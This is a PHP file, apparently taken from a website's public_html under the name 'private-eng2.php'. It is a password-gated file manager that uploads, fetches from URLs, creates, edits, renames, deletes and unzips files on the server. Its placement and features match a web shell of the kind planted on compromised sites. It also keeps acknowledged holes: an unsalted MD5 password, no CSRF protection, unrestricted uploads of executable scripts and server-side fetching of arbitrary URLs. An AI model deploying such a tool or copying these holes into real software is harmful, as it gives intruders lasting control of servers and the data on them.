File: /home/rallypictures/domains/rallyproductions.nl/public_html/private-eng2.php
<?php
//----------------------------------------------------------------------
// Configuration Section
//----------------------------------------------------------------------
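// Password Configuration
// SECURITY: the value below is an unsalted MD5 digest. MD5 is cheap to
// brute-force and carries no per-password salt, so anyone able to read this
// file should be assumed able to recover the password. Replacing it means
// storing a password_hash() value and checking it with password_verify()
// inside authenticate().
$PASSWORD_HASH = "872e5692587e344e891efb6385796206"; // MD5 hash of your password - VERY INSECURE. Change this.
// Base Directory Configuration (intended containment root).
// This constant only restricts anything if getSafePath() actually compares the
// resolved path against it.
define('FM_BASE_DIR', __DIR__); // Current directory of the script
//----------------------------------------------------------------------
// Authentication (Very Basic - DO NOT USE IN PRODUCTION)
//----------------------------------------------------------------------
// Harden the session cookie: not readable from JavaScript, not sent on
// cross-site requests (the forms on this page carry no CSRF token), and
// unknown session ids supplied by the client are rejected.
// 'cookie_samesite' needs PHP >= 7.3. Add 'cookie_secure' => true when the
// page is only ever served over HTTPS.
session_start([
    'cookie_httponly' => true,
    'cookie_samesite' => 'Strict',
    'use_strict_mode' => true,
]);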
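/**
 * Decide whether the current request is authenticated.
 *
 * Returns true when the session is already flagged as authenticated, or when
 * this is a POST carrying a 'password' field that matches the global
 * $PASSWORD_HASH. On a successful login the session id is regenerated (when a
 * session is active) so that an id issued before login cannot be reused.
 *
 * The stored value may be either the legacy 32-hex-digit MD5 digest or a
 * password_hash() string; the latter is verified with password_verify(), which
 * allows moving away from MD5 without touching this function again.
 *
 * NOTE(review): there is no limit on the number of attempts and no delay
 * between failures; combined with an unsalted MD5 this makes online and
 * offline guessing cheap.
 *
 * @return bool
 */
function authenticate() {
    global $PASSWORD_HASH;

    if (isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true) {
        return true;
    }

    $isPost = isset($_SERVER['REQUEST_METHOD']) && $_SERVER['REQUEST_METHOD'] === 'POST';
    $submitted = isset($_POST['password']) ? $_POST['password'] : null;

    // password[]=x arrives as an array; md5() would raise a TypeError on it.
    if (!$isPost || !is_string($submitted) || !is_string($PASSWORD_HASH)) {
        return false;
    }

    if (strlen($PASSWORD_HASH) === 32 && ctype_xdigit($PASSWORD_HASH)) {
        // Legacy digest: constant-time comparison instead of ===.
        $matches = hash_equals($PASSWORD_HASH, md5($submitted));
    } else {
        $matches = password_verify($submitted, $PASSWORD_HASH);
    }

    if (!$matches) {
        return false;
    }

    if (session_status() === PHP_SESSION_ACTIVE) {
        // Prevent session fixation: drop the pre-login session id.
        session_regenerate_id(true);
    }
    $_SESSION['authenticated'] = true;
    return true;
}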
// Access gate: every request that is not authenticated gets the login form
// and nothing else; the script stops here so no file-manager code below runs.
if (!authenticate()) {
    echo <<<'LOGIN_FORM'

<!DOCTYPE html>
<html>
<head><title>Authentication Required</title></head>
<body>
<h1>Authentication Required</h1>
<form method="post">
Password: <input type="password" name="password">
<button type="submit">Submit</button>
</form>
</body>
</html>
LOGIN_FORM;
    exit();
}
//----------------------------------------------------------------------
// Helper Functions
//----------------------------------------------------------------------
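/**
 * Resolve a request-supplied relative path to a canonical absolute path that
 * lies inside FM_BASE_DIR.
 *
 * realpath() collapses '..' segments and symlinks, so the containment test is
 * made on the resolved path. The comparison is separator-aware: a plain
 * "starts with FM_BASE_DIR" test would also accept a sibling directory whose
 * name merely begins with the base directory's name.
 *
 * Terminates the script with "Access Denied: Invalid path." when the path is
 * not a string, does not exist, or resolves outside the base directory.
 *
 * @param string $path Path relative to FM_BASE_DIR ('' means the base itself).
 * @return string Canonical absolute path inside FM_BASE_DIR.
 */
function getSafePath($path = '') {
    $base = realpath(FM_BASE_DIR);

    // Arrays (path[]=x) and NUL bytes are rejected before touching the filesystem.
    $usable = is_string($path) && strpos($path, "\0") === false;
    $target = $usable ? realpath(FM_BASE_DIR . '/' . $path) : false;

    if ($base === false || $target === false) {
        die("Access Denied: Invalid path.");
    }

    // rtrim keeps the prefix correct when the base is a filesystem root.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $insideBase = $target === $base || strncmp($target, $prefix, strlen($prefix)) === 0;

    if (!$insideBase) {
        die("Access Denied: Invalid path.");
    }
    return $target;
}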
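/**
 * Render a byte count as a human-readable string using 1024-based units.
 *
 * Negative input is treated as 0. The unit index is clamped to the range of
 * the unit table on both sides: values between 0 and 1 produce a negative
 * logarithm, which previously turned into a negative bit shift.
 *
 * @param int|float $bytes     Size in bytes.
 * @param int       $precision Decimal places passed to round().
 * @return string e.g. "1.5 KB".
 */
function formatBytes($bytes, $precision = 2) {
    $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
    $bytes = max($bytes, 0);

    $pow = $bytes ? (int) floor(log($bytes) / log(1024)) : 0;
    $pow = max(0, min($pow, count($units) - 1));

    // Exponentiation instead of a shift: no overflow on 32-bit integers.
    $bytes /= 1024 ** $pow;

    return round($bytes, $precision) . ' ' . $units[$pow];
}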
//----------------------------------------------------------------------
// File System Operations
//----------------------------------------------------------------------
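/**
 * Create a sub-directory of $targetDir and record the outcome in the session.
 *
 * $folderName comes straight from the request, so it is accepted only when it
 * is a single path component: no separators, no NUL byte, not '.' or '..'.
 * Without that check a name such as '../x' creates directories outside the
 * directory being browsed.
 *
 * The success message embeds the name verbatim; it must be HTML-escaped where
 * it is printed.
 *
 * @param string $targetDir  Directory in which to create the folder.
 * @param string $folderName Requested folder name.
 * @return void
 */
function handleCreateFolder($targetDir, $folderName) {
    $isPlainName = is_string($folderName)
        && $folderName !== '' && $folderName !== '.' && $folderName !== '..'
        && preg_match('~[/\\\\\x00]~', $folderName) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid folder name.";
        return;
    }

    $newDir = $targetDir . '/' . $folderName;
    if (mkdir($newDir)) {
        $_SESSION['message'] = "Folder '$folderName' created successfully.";
    } else {
        $_SESSION['error'] = "Failed to create folder.";
    }
}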
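/**
 * Move an uploaded file into $targetDir and record the outcome in the session.
 *
 * The client-supplied name is reduced to its last path component with
 * basename(). Malformed entries (missing upload, multi-file arrays where
 * 'name' is itself an array, names that reduce to '', '.' or '..') are
 * reported as a failed upload instead of reaching the filesystem calls.
 *
 * NOTE(review): there is no restriction on file type or extension. If the
 * target directory is served by the web server, an uploaded script becomes
 * executable content; restrict extensions or store uploads outside the
 * document root.
 *
 * @param string $targetDir Destination directory.
 * @param array  $file      One entry of $_FILES.
 * @return void
 */
function handleUploadFile($targetDir, $file) {
    $name = (is_array($file) && isset($file['name']) && is_string($file['name']))
        ? basename($file['name'])
        : '';
    $tmpName = (is_array($file) && isset($file['tmp_name']) && is_string($file['tmp_name']))
        ? $file['tmp_name']
        : '';

    if ($name === '' || $name === '.' || $name === '..' || $tmpName === '') {
        $_SESSION['error'] = "File upload failed.";
        return;
    }

    // move_uploaded_file() itself refuses anything that is not a genuine upload.
    if (move_uploaded_file($tmpName, $targetDir . '/' . $name)) {
        $_SESSION['message'] = "File '" . $name . "' uploaded successfully.";
    } else {
        $_SESSION['error'] = "File upload failed.";
    }
}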
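/**
 * Fetch a remote file over HTTP(S) and store it in $targetDir.
 *
 * file_get_contents() accepts local paths and every registered stream wrapper,
 * so an unchecked "URL" lets the caller copy arbitrary server-side files into
 * the target directory. Only absolute http:// and https:// URLs with a host
 * are accepted here, and the stored name is taken from the URL's path
 * component (query string excluded).
 *
 * NOTE(review): the set of hosts that may be contacted is not restricted, so
 * this is still a server-side request primitive (internal addresses, metadata
 * services). There is also no size limit on the response.
 *
 * @param string $targetDir Destination directory.
 * @param string $fileUrl   URL supplied by the request.
 * @return void
 */
function handleDownloadFile($targetDir, $fileUrl) {
    $parts = is_string($fileUrl) ? parse_url($fileUrl) : false;
    $scheme = (is_array($parts) && isset($parts['scheme'])) ? strtolower($parts['scheme']) : '';
    $host = (is_array($parts) && isset($parts['host'])) ? $parts['host'] : '';
    $filename = (is_array($parts) && isset($parts['path'])) ? basename($parts['path']) : '';

    $acceptable = in_array($scheme, ['http', 'https'], true)
        && $host !== ''
        && $filename !== '' && $filename !== '.' && $filename !== '..';

    if (!$acceptable) {
        $_SESSION['error'] = "Failed to download file.";
        return;
    }

    $fileContent = @file_get_contents($fileUrl);
    // The write result is checked too: a failed write is not a successful download.
    if ($fileContent !== false && file_put_contents($targetDir . '/' . $filename, $fileContent) !== false) {
        $_SESSION['message'] = "File '$filename' downloaded successfully.";
    } else {
        $_SESSION['error'] = "Failed to download file.";
    }
}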
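/**
 * Create a file in $targetDir with the given content.
 *
 * $fileName is request-controlled and is accepted only as a single path
 * component (no separators, no NUL byte, not '.' or '..'); otherwise the write
 * could land anywhere the PHP process may write. The write result is checked,
 * where previously only touch() was.
 *
 * NOTE(review): an existing file of the same name is overwritten, and any
 * extension is allowed, including ones the web server executes.
 *
 * @param string $targetDir   Destination directory.
 * @param string $fileName    Requested file name.
 * @param string $fileContent Content to write.
 * @return void
 */
function handleCreateFile($targetDir, $fileName, $fileContent) {
    $isPlainName = is_string($fileName)
        && $fileName !== '' && $fileName !== '.' && $fileName !== '..'
        && preg_match('~[/\\\\\x00]~', $fileName) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid file name.";
        return;
    }

    $newFilePath = $targetDir . '/' . $fileName;
    if (file_put_contents($newFilePath, (string) $fileContent) !== false) {
        $_SESSION['message'] = "File '$fileName' created successfully.";
    } else {
        $_SESSION['error'] = "Failed to create file.";
    }
}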
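/**
 * Rename an entry inside $targetDir.
 *
 * Both names are request-controlled. Each must be a single path component (no
 * separators, no NUL byte, not '.' or '..'); otherwise rename() doubles as a
 * move between arbitrary locations.
 *
 * NOTE(review): on most platforms rename() silently replaces an existing
 * destination file.
 *
 * @param string $targetDir Directory containing the entry.
 * @param string $oldName   Current name.
 * @param string $newName   New name.
 * @return void
 */
function handleRename($targetDir, $oldName, $newName) {
    foreach ([$oldName, $newName] as $candidate) {
        $isPlainName = is_string($candidate)
            && $candidate !== '' && $candidate !== '.' && $candidate !== '..'
            && preg_match('~[/\\\\\x00]~', $candidate) !== 1;
        if (!$isPlainName) {
            $_SESSION['error'] = "Invalid file name.";
            return;
        }
    }

    $oldPath = $targetDir . '/' . $oldName;
    $newPath = $targetDir . '/' . $newName;
    if (rename($oldPath, $newPath)) {
        $_SESSION['message'] = "File '$oldName' renamed to '$newName' successfully.";
    } else {
        $_SESSION['error'] = "Failed to rename file.";
    }
}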
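/**
 * Delete a file, or a directory with everything below it, from $targetDir.
 *
 * $itemName is request-controlled and must be a single path component. This
 * matters more here than anywhere else in the file: an empty name resolves to
 * $targetDir itself and '..' to its parent, so without the check one request
 * removes the directory being browsed or the one above it.
 *
 * Symbolic links are removed as links. isDir() follows links, so a link to a
 * directory is unlinked rather than passed to rmdir() via its resolved target,
 * and a top-level link is never walked recursively.
 *
 * @param string $targetDir Directory containing the entry.
 * @param string $itemName  Name of the entry to delete.
 * @return void
 */
function handleDelete($targetDir, $itemName) {
    $isPlainName = is_string($itemName)
        && $itemName !== '' && $itemName !== '.' && $itemName !== '..'
        && preg_match('~[/\\\\\x00]~', $itemName) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid item name.";
        return;
    }

    $itemPath = $targetDir . '/' . $itemName;

    if (is_dir($itemPath) && !is_link($itemPath)) {
        $entries = new RecursiveIteratorIterator(
            new RecursiveDirectoryIterator($itemPath, RecursiveDirectoryIterator::SKIP_DOTS),
            RecursiveIteratorIterator::CHILD_FIRST
        );
        // CHILD_FIRST: contents are removed before the directory holding them.
        foreach ($entries as $entry) {
            if ($entry->isDir() && !$entry->isLink()) {
                rmdir($entry->getPathname());
            } else {
                unlink($entry->getPathname());
            }
        }
        if (rmdir($itemPath)) {
            $_SESSION['message'] = "Directory '$itemName' deleted successfully.";
        } else {
            $_SESSION['error'] = "Failed to delete directory.";
        }
        return;
    }

    if (unlink($itemPath)) {
        $_SESSION['message'] = "File '$itemName' deleted successfully.";
    } else {
        $_SESSION['error'] = "Failed to delete file.";
    }
}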
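/**
 * Extract a zip archive located in $targetDir into that same directory.
 *
 * $zipFile is request-controlled and must be a single path component (no
 * separators, no NUL byte, not '.' or '..'), so only archives in the directory
 * being browsed can be opened.
 *
 * NOTE(review): entries are extracted without any limit on count or
 * uncompressed size, and files already present are overwritten. Consider
 * inspecting the archive (numFiles, statIndex) before extractTo().
 *
 * @param string $targetDir Directory holding the archive; also the destination.
 * @param string $zipFile   Archive file name.
 * @return void
 */
function handleUnzip($targetDir, $zipFile) {
    $isPlainName = is_string($zipFile)
        && $zipFile !== '' && $zipFile !== '.' && $zipFile !== '..'
        && preg_match('~[/\\\\\x00]~', $zipFile) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid file name.";
        return;
    }

    $zipPath = $targetDir . '/' . $zipFile;
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo($targetDir);
        $zip->close();
        $_SESSION['message'] = "Zip file '$zipFile' unzipped successfully.";
    } else {
        $_SESSION['error'] = "Failed to unzip file.";
    }
}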
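/**
 * Load a file from $targetDir into the session so the edit form can show it.
 *
 * $fileName is request-controlled and must be a single path component;
 * otherwise this is an arbitrary file read, since the content is rendered back
 * to the client. Non-files and unreadable files are reported as an error
 * instead of storing false as the content.
 *
 * @param string $targetDir Directory containing the file.
 * @param string $fileName  Name of the file to edit.
 * @return void
 */
function handleEdit($targetDir, $fileName) {
    $isPlainName = is_string($fileName)
        && $fileName !== '' && $fileName !== '.' && $fileName !== '..'
        && preg_match('~[/\\\\\x00]~', $fileName) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid file name.";
        return;
    }

    $filePath = $targetDir . '/' . $fileName;
    $content = is_file($filePath) ? file_get_contents($filePath) : false;
    if ($content === false) {
        $_SESSION['error'] = "Failed to open file.";
        return;
    }

    $_SESSION['edit_file'] = ['name' => $fileName, 'content' => $content];
}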
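/**
 * Write edited content back to a file in $targetDir and leave edit mode.
 *
 * $fileName arrives in a hidden form field, so the client controls it. It is
 * accepted only as a single path component (no separators, no NUL byte, not
 * '.' or '..'), which keeps the write inside $targetDir. The edit state is
 * cleared on every path, as before.
 *
 * NOTE(review): the name is not compared with the file that was opened for
 * editing, so any file in $targetDir can be written through this action.
 *
 * @param string $targetDir   Directory containing the file.
 * @param string $fileName    Name of the file to write.
 * @param string $fileContent New content.
 * @return void
 */
function handleSaveEdit($targetDir, $fileName, $fileContent) {
    $isPlainName = is_string($fileName)
        && $fileName !== '' && $fileName !== '.' && $fileName !== '..'
        && preg_match('~[/\\\\\x00]~', $fileName) !== 1;

    if (!$isPlainName) {
        $_SESSION['error'] = "Invalid file name.";
    } elseif (file_put_contents($targetDir . '/' . $fileName, (string) $fileContent) !== false) {
        $_SESSION['message'] = "File '$fileName' edited successfully.";
    } else {
        $_SESSION['error'] = "Failed to save file.";
    }
    unset($_SESSION['edit_file']);
}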
/**
 * Leave edit mode by dropping the pending edit from the session.
 * Nothing is written to disk.
 *
 * @return void
 */
function handleCancelEdit()
{
    // unset() is a no-op when no edit is pending.
    unset($_SESSION['edit_file']);
}
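/**
 * Dispatch a POSTed 'action' to its handler, then redirect back to the listing.
 *
 * The directory operated on is resolved from the 'path' query parameter via
 * getSafePath(). For a POST with an 'action' field the matching handler runs
 * and the script answers with a redirect (Post/Redirect/Get) and exits; for
 * any other request the function returns without doing anything.
 *
 * Request fields are checked before a handler is called: each must be present
 * and a string, and name-type fields must be non-empty. A missing name would
 * otherwise reach the handlers as null or '', which resolves to the current
 * directory itself.
 *
 * NOTE(review): none of the forms carries a CSRF token and none is checked
 * here, so every state-changing action can be triggered by a cross-site POST
 * from an authenticated browser. A per-session token in each form, verified at
 * the top of this function, closes that.
 *
 * @return void
 */
function processAction() {
    $rawPath = isset($_GET['path']) ? $_GET['path'] : '';
    // path[]=x would arrive as an array; treat it as the base directory.
    $requestedPath = is_string($rawPath) ? $rawPath : '';
    $currentDir = getSafePath($requestedPath);

    if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !isset($_POST['action'])) {
        return;
    }

    // action => [handler, name fields (non-empty), text fields (may be empty)]
    // Fields are passed to the handler in exactly this order.
    $actions = [
        'create_folder' => ['handleCreateFolder', ['folder_name'], []],
        'download_file' => ['handleDownloadFile', ['file_url'], []],
        'create_file'   => ['handleCreateFile', ['file_name'], ['file_content']],
        'rename'        => ['handleRename', ['old_name', 'new_name'], []],
        'delete'        => ['handleDelete', ['item_name'], []],
        'unzip'         => ['handleUnzip', ['zip_file'], []],
        'edit'          => ['handleEdit', ['file_name'], []],
        'save_edit'     => ['handleSaveEdit', ['edit_file_name'], ['edit_file_content']],
    ];

    $action = is_string($_POST['action']) ? $_POST['action'] : '';

    if ($action === 'upload_file') {
        $upload = isset($_FILES['upload_file']) ? $_FILES['upload_file'] : null;
        if (is_array($upload)) {
            handleUploadFile($currentDir, $upload);
        } else {
            $_SESSION['error'] = "Missing or malformed request field.";
        }
    } elseif ($action === 'cancel_edit') {
        handleCancelEdit();
    } elseif (isset($actions[$action])) {
        list($handler, $nameFields, $textFields) = $actions[$action];
        $arguments = [];
        $complete = true;
        foreach (array_merge($nameFields, $textFields) as $field) {
            $value = isset($_POST[$field]) ? $_POST[$field] : null;
            $mayBeEmpty = in_array($field, $textFields, true);
            if (!is_string($value) || ($value === '' && !$mayBeEmpty)) {
                $complete = false;
                break;
            }
            $arguments[] = $value;
        }
        if ($complete) {
            $handler($currentDir, ...$arguments);
        } else {
            $_SESSION['error'] = "Missing or malformed request field.";
        }
    }
    // Unknown actions fall through to the redirect, as before.

    header("Location: ?path=" . urlencode($requestedPath));
    exit();
}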
//----------------------------------------------------------------------
// List Files and Folders
//----------------------------------------------------------------------
/**
 * Build the rows shown in the listing table for one directory.
 *
 * Each row has: 'name', 'path' (the full path with the FM_BASE_DIR prefix and
 * one separator cut off), 'type' ('directory' or 'file'), 'size' (bytes for
 * files, '-' for directories) and 'modified' (Y-m-d H:i:s).
 *
 * NOTE(review): 'path' is produced by cutting a fixed number of characters,
 * which is only meaningful while $directory lies inside FM_BASE_DIR.
 *
 * @param string $directory Absolute directory path.
 * @return array List of row arrays in scandir() order.
 */
function listFilesAndFolders($directory) {
    $listing = [];
    foreach (scandir($directory) as $entry) {
        // Skip the self and parent pseudo-entries.
        if (in_array($entry, ['.', '..'], true)) {
            continue;
        }
        $absolute = $directory . '/' . $entry;
        if (is_dir($absolute)) {
            $kind = 'directory';
            $size = '-';
        } else {
            $kind = 'file';
            $size = filesize($absolute);
        }
        $listing[] = [
            'name' => $entry,
            'path' => substr($absolute, strlen(FM_BASE_DIR) + 1),
            'type' => $kind,
            'size' => $size,
            'modified' => date("Y-m-d H:i:s", filemtime($absolute)),
        ];
    }
    return $listing;
}
//----------------------------------------------------------------------
// Main Execution
//----------------------------------------------------------------------
// Handle a pending POST action first; when one is present processAction()
// redirects and exits, so the lines below only run for plain page views.
processAction();

// Resolve the requested directory and collect its entries for the table.
$safePath = getSafePath(isset($_GET['path']) ? $_GET['path'] : '');
$files = listFilesAndFolders($safePath);

// Target of the "Go to Parent Directory" link; dirname() yields '.' for a
// top-level entry, which maps to the base directory ('').
$parentDir = dirname(isset($_GET['path']) ? $_GET['path'] : '');
if ($parentDir == '.') {
    $parentDir = '';
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Another File Manager</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
<style>
body { font-family: Arial, sans-serif; }
.container { margin-top: 20px; }
.breadcrumb a { margin-right: 5px; }
.table th, .table td { vertical-align: middle; }
</style>
</head>
<body>
<div class="container">
<h1>File Manager</h1>
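<?php
// Flash messages embed request-supplied file and folder names, so they are
// HTML-escaped on output; printed raw, a crafted name would be rendered as
// markup in this page.
?>
<?php if (isset($_SESSION['message'])): ?>
<div class="alert alert-success"><?= htmlspecialchars((string) $_SESSION['message'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></div>
<?php unset($_SESSION['message']); ?>
<?php endif; ?>
<?php if (isset($_SESSION['error'])): ?>
<div class="alert alert-danger"><?= htmlspecialchars((string) $_SESSION['error'], ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); ?></div>
<?php unset($_SESSION['error']); ?>
<?php endif; ?>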
<nav aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item"><a href="?path=">Home</a></li>
<?php
$pathSegments = explode('/', trim($_GET['path'] ?? '', '/'));
$currentBreadcrumbPath = '';
foreach ($pathSegments as $segment):
$currentBreadcrumbPath .= '/' . $segment;
?>
<li class="breadcrumb-item">
<a href="?path=<?= urlencode(trim($currentBreadcrumbPath, '/')); ?>">
<?= htmlspecialchars($segment); ?>
</a>
</li>
<?php endforeach; ?>
</ol>
</nav>
<div class="mb-3">
<a href="?path=<?= urlencode($parentDir); ?>" class="btn btn-secondary">Go to Parent Directory</a>
</div>
<div class="row mb-3">
<div class="col-md-4">
<form method="post" enctype="multipart/form-data" class="mb-3">
<input type="hidden" name="action" value="upload_file">
<div class="input-group">
<input type="file" class="form-control" name="upload_file" required>
<button type="submit" class="btn btn-primary">Upload File</button>
</div>
</form>
<form method="post" class="mb-3">
<input type="hidden" name="action" value="create_folder">
<div class="input-group">
<input type="text" class="form-control" name="folder_name" placeholder="New folder name" required>
<button type="submit" class="btn btn-primary">Create Folder</button>
</div>
</form>
</div>
<div class="col-md-4">
<form method="post" class="mb-3">
<input type="hidden" name="action" value="download_file">
<div class="input-group">
<input type="url" class="form-control" name="file_url" placeholder="File URL" required>
<button type="submit" class="btn btn-primary">Download File</button>
</div>
</form>
<form method="post">
<input type="hidden" name="action" value="create_file">
<div class="input-group">
<input type="text" class="form-control" name="file_name" placeholder="File name" required>
<button type="submit" class="btn btn-primary">Create File</button>
</div>
<textarea class="form-control mt-2" name="file_content" placeholder="File content"></textarea>
</form>
</div>
</div>
<h2>Files and Folders</h2>
<table class="table table-striped table-bordered">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th>Size</th>
<th>Last Modified</th>
<th>Actions</th>
</tr>
</thead>
<tbody>
<?php foreach ($files as $file): ?>
<tr>
<td>
<?php if ($file['type'] === 'directory'): ?>
<a href="?path=<?= urlencode($file['path']); ?>"><?= htmlspecialchars($file['name']); ?></a>
<?php else: ?>
<?= htmlspecialchars($file['name']); ?>
<?php endif; ?>
</td>
<td><?= ucfirst($file['type']); ?></td>
<td><?= ($file['type'] === 'file') ? formatBytes($file['size']) : '-'; ?></td>
<td><?= $file['modified']; ?></td>
<td>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="delete">
<input type="hidden" name="item_name" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-danger btn-sm" onclick="return confirm('Are you sure?')">Delete</button>
</form>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="rename">
<input type="hidden" name="old_name" value="<?= htmlspecialchars($file['name']); ?>">
<input type="text" name="new_name" placeholder="New name" required class="form-control form-control-sm" style="width: 100px; display: inline;">
<button type="submit" class="btn btn-warning btn-sm">Rename</button>
</form>
<?php if ($file['type'] === 'file'): ?>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="edit">
<input type="hidden" name="file_name" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-info btn-sm">Edit</button>
</form>
<?php if (strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)) === 'zip'): ?>
<form method="post" class="d-inline">
<input type="hidden" name="action" value="unzip">
<input type="hidden" name="zip_file" value="<?= htmlspecialchars($file['name']); ?>">
<button type="submit" class="btn btn-success btn-sm">Unzip</button>
</form>
<?php endif; ?>
<?php endif; ?>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
<?php if (isset($_SESSION['edit_file'])): ?>
<h2>Editing: <?= htmlspecialchars($_SESSION['edit_file']['name']); ?></h2>
<form method="post">
<input type="hidden" name="action" value="save_edit">
<input type="hidden" name="edit_file_name" value="<?= htmlspecialchars($_SESSION['edit_file']['name']); ?>">
<textarea class="form-control" name="edit_file_content" rows="10"><?= htmlspecialchars($_SESSION['edit_file']['content']); ?></textarea>
<button type="submit" class="btn btn-primary mt-2">Save</button>
<button type="submit" name="action" value="cancel_edit" class="btn btn-secondary mt-2">Cancel</button>
</form>
<?php endif; ?>
</div>
</body>
</html>